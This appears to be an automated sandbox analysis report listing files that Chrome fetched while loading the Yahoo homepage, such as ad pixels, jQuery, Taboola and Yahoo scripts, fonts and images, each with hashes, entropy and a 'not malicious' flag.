                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/media/v1/hls/v4/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/ecd7fa54-e6d3-46ce-a5f5-f4f8026a87f9/d9935f8c-bc8c-465d-90ed-e5c8188bebe4/3x/segment0.ts?akamai_token=exp=1728075383~acl=/media/v1/hls/v4/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/ecd7fa54-e6d3-46ce-a5f5-f4f8026a87f9/d9935f8c-bc8c-465d-90ed-e5c8188bebe4/*~hmac=0719d2b51c9e2ce1976d76b86328c2cceff25779feaebfebfe8a951e2ddde9a9
                                                                                                                                                                                                                  Preview:....&.N...gi._.......?pWO.........x...7.....5./...n...P...........;.K...AI.L.F........[.RB.*.y..T.4."..-\.1;.:t4&...=4m.e"|5...b.i5..&..7T.M...i..0e.H....f.....d~d.A..pZC.$.V...q9._F.2/..z.\..e..W.R2J....t.d...2...P.`Y.....<23_...5..,...7<...^.0...q........9}...A.o...,.<.C.t,.Q...=.......Sm../>Pj .....Al..5uc.J..../....1....\+....=^Cg.......j)..8.9..JjH......5.E.......('.(w3.....`........9.......)..P.a..O......L.n..)V...oC..]~c.g. .$T.......`;...~#a...li~.M.. )13...T...=....J.%9{C.p/........`:..H....#J;.+..M.i............ |..U..7.O........Y.Rc.......Z7*~...(...cO..K....M......p2.8r1.+.8T<+......Eka..@.~.....)..N+l...<.Y..d.|......~..F..U0....LC.Pg....x.:....B.*.../...B..`...;.B..A8.m....$t0.......=;V.......%SgO..'.....==.|Y..`.h...q0(...b..X.G....R......a...1..7..3..Z.V.r..y..4....a...D...<n......5.L..6.g.+s...q|.^...V%./....._.4).o..[..j...}.&.l.AZ...h._i[..H.~=......q==.......a..=J...a.<.."..[.jc3.3......'RH~UY......N.I..p
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 8 bits/pixel
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1406
                                                                                                                                                                                                                  Entropy (8bit):1.6826987302732233
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B6814AE5582D7953821ACBD76E977BB4
                                                                                                                                                                                                                  SHA1:75A33FC706C2C6BA233E76C17337E466949F403C
                                                                                                                                                                                                                  SHA-256:4A491ACD00880C407A2B749619003716C87E9C25AC344E5934C13E8F9AA0E8B3
                                                                                                                                                                                                                  SHA-512:958268F22E72875B97C42D8927E6A1D6168C94FE2184DE906029688A9D63038301DF2E3DE57E571A3D0ECC7AD41178401823E5C54576936D37C84C7A3ED8EF6B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico
                                                                                                                                                                                                                  Preview:..............h.......(....... .................................`...d...f...i...k...m...p...q...s.. s..$v..*z..?...D...M...V..._...b...c...l...v...y...|.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):89501
                                                                                                                                                                                                                  Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):67600
                                                                                                                                                                                                                  Entropy (8bit):7.399457404348197
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F3A6B3E0B4043794FA37CCA40A57F73C
                                                                                                                                                                                                                  SHA1:340EBF2722DF016D33014C6EAB05888D69323F3A
                                                                                                                                                                                                                  SHA-256:32BC5E8B5340079E3563F0173B8009A9C9070AB4E2286114EC3FD793C609ACA7
                                                                                                                                                                                                                  SHA-512:194E45A092DBD44945B02B145A0FC29E2EB18CD10DFDF340CA61E843172C2F3A3A6456BA8BD147EFE6ED108B14D029882AB69A54FF9D01B963AA5E00BC35D998
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/pv/static/misc/voice-result-202105050733.wav:2f823ded1e350d:0
                                                                                                                                                                                                                  Preview:RIFF.9..WAVEfmt ........D... b.... .dataH...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65096)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1424814
                                                                                                                                                                                                                  Entropy (8bit):5.416450120737417
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:605B47A1EA394FA66F6018AA41763180
                                                                                                                                                                                                                  SHA1:C63B17F6230A898FC45B8D33C7D81CF6BDAF2038
                                                                                                                                                                                                                  SHA-256:121F39BBCF85946126ABCAAC8BAD3FACFEAB0B3F2F0525E837EC5B77F74245E1
                                                                                                                                                                                                                  SHA-512:000BA357E0478004B1349740C47A294FF1F29C7E25F69D219D42581C9D3C6E274A72D2307C2CA81199A4628030E35D4A9F4F42DB01C279B6A3ACFC574AF171A0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview://AB_TEMPLATE.//ab -> 28......var _taboola = _taboola || [];var TRC = TRC || {};.TRC.perfConfOverride = {'logTimer': 50000, 'logLength' : 5, 'traffic' : 50, 'measureEnable' : true, 'measureTimeToSend' : 10000, 'measureInterval' : 10000, 'disableRawDataSend': true};............................................................................................................................................................................. ..(function(){var __webpack_modules__={6337:function(){!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersecting"in window.IntersectionObserverEntry.prototype||Object.defineProperty(window.IntersectionObserverEntry.prototype,"isIntersecting",{get:function(){return this.intersectionRatio>0}});else{var e=function(e){for(var t=window.document,n=r(t);n;)n=r(t=n.ownerDocument);return t}(),t=[],n=null,i=null;a.prot
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.971575655820762
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:2C4BC2A6107C8A51DAE9B6BE6AD7E8F7
                                                                                                                                                                                                                  SHA1:8DFA1611BFCE226781AF6D165AF327769290EC4B
                                                                                                                                                                                                                  SHA-256:14CD771B18F40150D3C0C6CB20071318A69E68AE59FB93DEC07E0E63B69F369C
                                                                                                                                                                                                                  SHA-512:0B0FC024667AE2B179DBBCF8B6D8440E8757F61A03B51AE0C1C151BA9CC4CD2B5CD3A9A9797902E3B47DC60289E0B8D528832350E3F37DAC391284C9E3CDAAD7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............C....................................................................C.........................................................................,............................................Z.........................!..1.AQa.."2q......#BR......$3Wbdr..&7CDFV...%'6GTev..s..........................................C.........................!..1."2AQq...#a....$35BCRTr..DS.%4..b...............?...........Q._~:R.S..kg&.S...(G.(e....9....J=.Y.G.p.(o........u}.)..i....^S.).....z..1..'.qd^..[.-..9..#..~.\kf..i....M0.|.1.!...T..@.../[(......-....._.....:..VL..#.,b..V:.u.}&......J...)..m8=..R....x......;`.#E....Cik..uU...{....*....$.^U.Q......V3:n:....."..u...GR...*Wu}.G.....H......K)H.R....._J#Sw..W..f..fz;..S..;....j..w..?.~.....)..p..p./..$....Q..3s..........d_/.u...n..`f...........;.ER...%.N.8.;._...W..nT}.....G...../..n....y..D4....Gu../..=.....tZ.\...t......b.J..4..J.#.Z$."...yf><./:.):.D.sXm..!(...:...`w.u...P1m.1.-C......YuF....<.l.....Zq..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6645), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):6645
                                                                                                                                                                                                                  Entropy (8bit):5.153971139811532
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:2E3968239B770B8186BB480D513311CD
                                                                                                                                                                                                                  SHA1:E2583E321454F9F48193918E3316533226ED62FA
                                                                                                                                                                                                                  SHA-256:D77E659299C397037513AFF88093B64F6CE29994B94D99256AD84A7910C0CEB3
                                                                                                                                                                                                                  SHA-512:487F486C165C5E6FAD46A8BBCB6279147FA93D3D3A004327D0DFDEA5040F9B320FE5439A0E2E849DFBB8CBB4FC1ADFDF6647BCCA1DDECCAAD5C36093FCE7A2B2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-image-1.4.0-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-image",[],t):"object"==typeof exports?exports["wafer-image"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-image"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(r[a])return r[a].exports;var o=r[a]={i:a,l:!1,exports:{}};return e[a].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,a){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):170
                                                                                                                                                                                                                  Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                  SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                  SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                  SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=TTFVVTBDWEgtMTgtMzRUSQ==&google_push=&gdpr=0
                                                                                                                                                                                                                  Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1620)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1621
                                                                                                                                                                                                                  Entropy (8bit):5.329855816477348
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6D969B0F81242D36A88FA5922140249E
                                                                                                                                                                                                                  SHA1:404E22A5E111FA02CFB626D45B201E598B425FA5
                                                                                                                                                                                                                  SHA-256:7619B789D24BE9FCDC5B3A1DB864CA3B8194FA054D5881EEEA7F0D0F8A171705
                                                                                                                                                                                                                  SHA-512:9C5CF9A3BC9170A9548DC8E36D349D2F751A3238177C60907F54720BF5F94736634DB4A1C12839F5EE5D0D2654F36F4CA87294ADD62CEDEA8709C203A832F61C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/vzm/cs_1.6.6.js
                                                                                                                                                                                                                  Preview:!function(){"use strict";var c=window,t=c.document,e="*null",s=[1,9,10];function n(t,e,s,n){if(!t||!e||"function"!=typeof c[t])return n();try{c[t](e,s,(function(c,t){n(c,t)}))}catch(c){n()}}c.COMSCORE={_version:"1.6.6",beacon:function(r){n("__uspapi","getDoNotSell",1,(function(p,f){n("__tcfapi","getTCData",2,(function(n,o){var i=JSON.parse(JSON.stringify(r||{})),_=n&&n.gdprApplies||!1,a=c.YAHOO&&c.YAHOO.comscore||{},d=c.rapidInstance&&c.rapidInstance.getRapidAttribute;if(i.c1=i.c1||"2",i.c2=i.c2||a.c2||"7241469",i.c5=i.c5||d&&d("spaceid"),i.c7=i.c7||t.location.href,i.c8=i.c8||t.title||"",i.c9=i.c9||t.referrer||"",i.c14=i.c14||a.c14||"-1",i.gdpr=_?1:0,i.gdpr_consent="",_){if(o&&n){var u=s.every((c=>!0===n.purpose.consents[c])),l=!0===n.vendor.consents[77];i.cs_ucfr=u&&l?1:u&&l?"":0,i.gdpr_consent=n.tcString||""}}else f&&p&&"boolean"==typeof p.doNotSell?i.cs_ucfr=p.doNotSell?0:1:i.cs_ucfr=0;var g=i.cs_fpid||a.cs_fpid;if(g)if(i.cs_ucfr){var m=i.cs_fpdm||a.cs_fpdm;m&&m!==e?(i.cs_fpdm=m,i.c
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65508)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):940795
                                                                                                                                                                                                                  Entropy (8bit):5.353002404591996
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:82AE4F87390F194796BD5FEB4A82AA68
                                                                                                                                                                                                                  SHA1:B948378A8CE386BC9A0D9D2AAFAA7603E5BB31F7
                                                                                                                                                                                                                  SHA-256:A6F1E0B2FF804F480E40D3D69BD3DE78E8AED715895BD00B36E42CBCA18BCA9A
                                                                                                                                                                                                                  SHA-512:C021B7883BCD5C99F57E0197E631AA2CF12041A5B5ECAEAC1DE07588E6884E3BD8F98AFF0639B2EA4BF1AE801AD82500441D8A51E0D87824D17CDD9425C90664
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:/*! 20241001-19-RELEASE */..!function(e){e.TRC=e.TRC||{},e.TRC.sharedObjects=e.TRC.sharedObjects||{},e.TRC.sharedObjects.loadedScripts=e.TRC.sharedObjects.loadedScripts||{},e.TRC.sharedObjects.loadedPixels=e.TRC.sharedObjects.loadedPixels||{}}(window),function(){var win,doc;((e,t,r)=>{const i="trc_modal_hidden",o="trc_modal_mask",n="trc_modal_dialog",a="trc_close_modal",s=t.createElement("div"),l=t.createElement("div");let c,d="";function p(){u(l,i),u(s,i),r.dom.off(t,"keyup",m),r.dom.off(t,"click",g),r.dom.off(t.getElementById(a),"click",g),r.dom.off(e,"message",b)}function h(){u(l,o),u(l,i),u(s,n),u(s,i),w.appendChild(l),w.appendChild(s),t.body.appendChild(R),y(d),c=!0}const u=function(e,t){if(e.classList)return e.classList.add(t);r.dom.removeClass(e,t),e.className+=` ${t}`},m=e=>{const t=e.which||e.keyCode;27===t&&p()},g=e=>{const t=e.target||e.srcElement;t!==l&&t.id!==a||(r.dom.stopEvent(e),p())},b=e=>{/http(s)?:\/\/www\.taboola\.com/.test(e.origin)&&e.data&&1025==+e.data&&p()},f=f
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7213)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):7214
                                                                                                                                                                                                                  Entropy (8bit):5.214208203980227
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DADA04F94A4FC4D19AC57A29F0BEAB05
                                                                                                                                                                                                                  SHA1:ABBC9E83436AEC35D71F4CAE162B49F31821E135
                                                                                                                                                                                                                  SHA-256:A9C978CE0E816FE6148ABDC5B90980B165BE9E12E49F068A2504291901C229DB
                                                                                                                                                                                                                  SHA-512:A015C1EBAA29F1F12E00E7AF72D92D65C14DFF3EC618AF100BF0B651B8FA0A61B05C25611D343E6AB7ACC8DCDF58E7D6A8E14884BDC7D2E3AEE723E6FF80B5AC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/cx/pv/perf-vitals_3.3.0.js
                                                                                                                                                                                                                  Preview:!function(){"use strict";var e,t=-1,n=function(e){addEventListener("pageshow",(function(n){n.persisted&&(t=n.timeStamp,e(n))}),!0)},r=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},i=function(){var e=r();return e&&e.activationStart||0},a=function(e,n){var a=r(),o="navigate";return t>=0?o="back-forward-cache":a&&(document.prerendering||i()>0?o="prerender":document.wasDiscarded?o="restore":a.type&&(o=a.type.replace(/_/g,"-"))),{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:o}},o=function(e,t,n){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){t(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},n||{})),r}}catch(e){}},c=function(e,t,n
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                  SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                  SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                  SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://us-u.openx.net/w/1.0/sd?id=537072991&val=CAESEHTwOzeWSxWAPtydkRDWLZo&google_cver=1
                                                                                                                                                                                                                  Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                  Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                  SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                  SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                  SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://rp.liadm.com/j?dtstmp=1728052781592&did=did-004f&se=e30&duid=05c3ae107b3d--01j9bzhr0v6natdswmt3q3e7cp&tv=8.51.0&pu=https%3A%2F%2Fwww.yahoo.com%2F&us_privacy=1YNN&wpn=prebid&gdpr=0&refr=https%3A%2F%2F9wetjda.niavereinho.ru%2F&gpp_s=DBAA&gpp_as=-1&cd=.yahoo.com&n3pc=true
                                                                                                                                                                                                                  Preview:{"bakers":[]}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), CFF, length 39888, version 0.0
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):39888
                                                                                                                                                                                                                  Entropy (8bit):7.993057630420192
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F7FFC5F925D3B186F552CDE1C3E99691
                                                                                                                                                                                                                  SHA1:6827B93164847BDA1B696FA71E0997C30FD9D007
                                                                                                                                                                                                                  SHA-256:22ACA3530F993651436788F0EFFAB7C09D3AC03BB0CDFCC8D809629E24CD54C7
                                                                                                                                                                                                                  SHA-512:E2524E10B00A4F7F83BB88D8EE4C1C1E6E367F0B0A1823F8D0FE4F72BA6FE14F9B146BA852D3F442AA1D8A3ABFDDCD6A86CA3387A28C95D57FF7A1D80A5E4B20
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/bw/fonts/centra-no2-bold.woff2
                                                                                                                                                                                                                  Preview:wOF2OTTO...........................................8......|.`..D.6.$..T...... [Y........."..."..V...............?...~................E`...:..C8*....x.......KN.!.i...0.P.....:kw~....#..,.S.....y.b/p.B.P.h.......h..#....'.6..${...v...b...i O... ..$..Y....,...0...6.u...Yu.......(K...X*.Y[E.`.K.+.F.*..P,....X..t.+.tL.|cr......[OLf.u.....@...ba..b..T..5..X*..-...=T14;.wVQ...x.....T.(..n..|c"%\..ho.n9T ..dc..p...Y....\B;...._}...4glC6.m..Ki.l......b.QC4....,b...uOE...\h/.{.y..~...u.&.9...y....n..........4e:.....'5...TL........T.......=.........A-.*bY.4.:w.6.5.V...Zz5V..w..Y...%A....t.{.*.BP.]=,..8M~1....Wr.....v.C...l..v.......A..A.(@%i.?..7..,...n..0*W...r].E.s...........7.&6.=O...U..}..D"T.h..D"...S-..g>0.. /.."/K...3...Up.+W~...g...@.....gP..S.....3..p.A.J -R1.B.,s3V.x..u...)...se....]..:...s.+.tS.*..\V.......G.e..g.j...".....}.+.W..Hv@o4`...N.x Z../.B...%.....U@.5V.d..t..5....V[o].!...Hu..&.8.a..y....>...=Sf....C....Y...+..-6...`..Xi.......
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (717)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):786
                                                                                                                                                                                                                  Entropy (8bit):5.219841148069385
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:FB5A4594B9FFEF704D61BB6E6F80F145
                                                                                                                                                                                                                  SHA1:B5CE60A22B42FCD31FE8B2810AAA277D545BE43B
                                                                                                                                                                                                                  SHA-256:3C30F0F816ADA3A1410045D740A98E4D2FAF07FC74FFC0430678B21ABBD05138
                                                                                                                                                                                                                  SHA-512:77C63E1249E4BDF2DE43C74531A64E0AFE7305662BFA46252C432318B374CE7B0A6FC24645A5FDD5E9A4B18D4D924BF74E970B6E64D20B45DFBA263E51AD5FB4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://tsdtocl.com/
                                                                                                                                                                                                                  Preview:<!doctype html>.<html>.<head>.<script>.!function(){var e="tsdtocl",t="!-#@",a=2;try{var n=function t(a,n){return n.namespace=e,n.id=a,parent.postMessage(JSON.stringify(n),"*"),n},r=function e(r,s,c){try{if(void 0===c||void 0===r||void 0===s)throw 0;var i=localStorage.getItem(s),o=i?i.split(t):[];if(-1!==o.indexOf(c))return n(r,{success:!0,wasAppended:!1});o.push(c);var d=o.slice(-a).join(t);localStorage.setItem(s,d);var u=localStorage.getItem(s);return n(r,{value:d,wasAppended:!0,success:u===d})}catch(e){return n(r,{success:!1})}},s=function t(a){var n;try{n=JSON.parse(a.data)}catch(e){}if(n&&n.namespace===e&&"append"===n.action)return r(n.id,n.key,n.value)};window.self!==window.top&&window.addEventListener("message",s,!1)}catch(e){}}();</script>.</head>.<body></body>.</html>
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):23924
                                                                                                                                                                                                                  Entropy (8bit):7.941751597815332
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F32237965F14660BE7BC838CE3191291
                                                                                                                                                                                                                  SHA1:D4AA4E7C7D15B3E4EC9F0679ED1508A4CD07392C
                                                                                                                                                                                                                  SHA-256:2150DD8CA5EAFFCD9870C1559ADB646CC6DB030BC22216EC6EFB510CABA0281A
                                                                                                                                                                                                                  SHA-512:25DF2D49914A3D44173B17284300416D555096D10EDAD36A7A89D0D4F16613A98F614D29EF9B0EFA51C60DEC72DE854D65ED5BBD45116AEA67FABED6D4F68D51
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C....................................................................C......................................................................................................................O..........................!.1Aa..Q"2q....B..#Rb....3..CSr....$Tc......%DEt...................................1........................!1.A..."2Q.Ba.#R3bq.S..............?...^....-...k.^M....We......D..$.j. W*.j@.@....2..Z..bF-.i.ri...*X...@/.`
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (602)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):801
